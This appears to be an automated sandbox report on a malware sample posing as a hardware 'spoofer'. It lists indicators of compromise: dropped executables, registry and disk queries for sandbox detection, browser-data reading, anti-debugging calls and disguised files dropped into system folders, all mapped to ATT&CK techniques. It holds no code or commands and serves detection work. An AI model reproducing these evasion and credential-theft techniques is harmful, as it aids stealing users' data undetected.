b55454760356e6ec102c5b3b999488973f8b7baed94eddf9e11be838f0c6901e

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	HyperSpoofer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	HpsrSpoof.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	sphyperRuntimedhcpSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	VC_redistx64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	sphyperRuntimedhcpSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	service.exe

Executes dropped EXE 64 IoCs

pid	Process
1940	HpsrSpoof.exe
4248	sphyperRuntimedhcpSvc.exe
3104	conhostsft.exe
2404	VC_redistx64.exe
552	Volumeid64.exe
3424	DevManView.exe
3408	DevManView.exe
2636	DevManView.exe
4964	DevManView.exe
5080	DevManView.exe
1088	DevManView.exe
4356	DevManView.exe
408	DevManView.exe
2900	DevManView.exe
3000	DevManView.exe
2580	DevManView.exe
2924	DevManView.exe
4840	DevManView.exe
3764	DevManView.exe
2392	DevManView.exe
2440	sphyperRuntimedhcpSvc.exe
3108	AMIDEWINx64.exe
1912	AMIDEWINx64.exe
3156	AMIDEWINx64.exe
432	AMIDEWINx64.exe
1472	AMIDEWINx64.exe
3956	AMIDEWINx64.exe
4864	AMIDEWINx64.exe
2040	AMIDEWINx64.exe
3856	AMIDEWINx64.exe
3860	AMIDEWINx64.exe
4228	VC_redist.x64.exe
2084	taskhostw.exe
3380	AMIDEWINx64.exe
4136	AMIDEWINx64.exe
1668	AMIDEWINx64.exe
376	AMIDEWINx64.exe
4492	AMIDEWINx64.exe
648	AMIDEWINx64.exe
4692	AMIDEWINx64.exe
4364	AMIDEWINx64.exe
5116	AMIDEWINx64.exe
3408	AMIDEWINx64.exe
4688	AMIDEWINx64.exe
4480	AMIDEWINx64.exe
1748	AMIDEWINx64.exe
3772	AMIDEWINx64.exe
1548	AMIDEWINx64.exe
2080	AMIDEWINx64.exe
956	AMIDEWINx64.exe
5116	AMIDEWINx64.exe
624	AMIDEWINx64.exe
4520	AMIDEWINx64.exe
3496	Volumeid64.exe
5016	Volumeid64.exe
4328	Volumeid64.exe
3596	Volumeid64.exe
4696	Volumeid64.exe
4288	Volumeid64.exe
1176	service.exe
4904	Volumeid64.exe
4316	Volumeid64.exe
2064	Volumeid64.exe
2244	Volumeid64.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Enumerates connected drives 3 TTPs 30 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Maps connected drives based on registry 3 TTPs 64 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count = "0"	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\NextInstance = "0"	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Delete value	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1992	powercfg.exe
4288	powercfg.exe
4908	powercfg.exe
4140	powercfg.exe
1308	powercfg.exe
4692	powercfg.exe
3152	powercfg.exe
3948	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	VC_redist.x64.exe
File opened for modification	C:\Windows\system32\MRT.exe	conhostsft.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 28 IoCs

pid	Process
400	HyperSpoofer.exe
2404	VC_redistx64.exe
2404	VC_redistx64.exe
2404	VC_redistx64.exe
2404	VC_redistx64.exe
2404	VC_redistx64.exe
1176	service.exe
1176	service.exe
2404	VC_redistx64.exe
1176	service.exe
2404	VC_redistx64.exe
1176	service.exe
2404	VC_redistx64.exe
1176	service.exe
2404	VC_redistx64.exe
1176	service.exe
2404	VC_redistx64.exe
1176	service.exe
2404	VC_redistx64.exe
1176	service.exe
2404	VC_redistx64.exe
1176	service.exe
2404	VC_redistx64.exe
1176	service.exe
2404	VC_redistx64.exe
1176	service.exe
2404	VC_redistx64.exe
1176	service.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4228 set thread context of 4000	4228	VC_redist.x64.exe	251

Drops file in Program Files directory 7 IoCs

description	ioc	Process
File created	C:\Program Files\Common Files\System\66fc9ff0ee96c2	sphyperRuntimedhcpSvc.exe
File created	C:\Program Files\WindowsApps\RuntimeBroker.exe	sphyperRuntimedhcpSvc.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\taskhostw.exe	sphyperRuntimedhcpSvc.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\ea9f0e6c9e2dcd	sphyperRuntimedhcpSvc.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\taskhostw.exe	sphyperRuntimedhcpSvc.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\ea9f0e6c9e2dcd	sphyperRuntimedhcpSvc.exe
File created	C:\Program Files\Common Files\System\sihost.exe	sphyperRuntimedhcpSvc.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.dev.log	DevManView.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DevManView.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
432	sc.exe
3664	sc.exe
1092	sc.exe
3660	sc.exe
3664	sc.exe
4092	sc.exe
2440	sc.exe
1784	sc.exe
4952	sc.exe
2012	sc.exe
2768	sc.exe
2180	sc.exe
2656	sc.exe
2868	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HyperSpoofer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sphyperRuntimedhcpSvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VC_redistx64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\LocationInformation	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ClassGUID	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Driver	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000B	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\LocationInformation	DevManView.exe
Delete value	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065\	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065\	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000064\00000000	DevManView.exe
Delete value	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0009\	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\LocationInformation	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ContainerID	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Control	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065\	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Service	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ClassGuid	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Device Parameters	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000066\00000000	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ConfigFlags	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065\	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000066\00000000	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\LocationInformation	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ClassGUID	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065	DevManView.exe
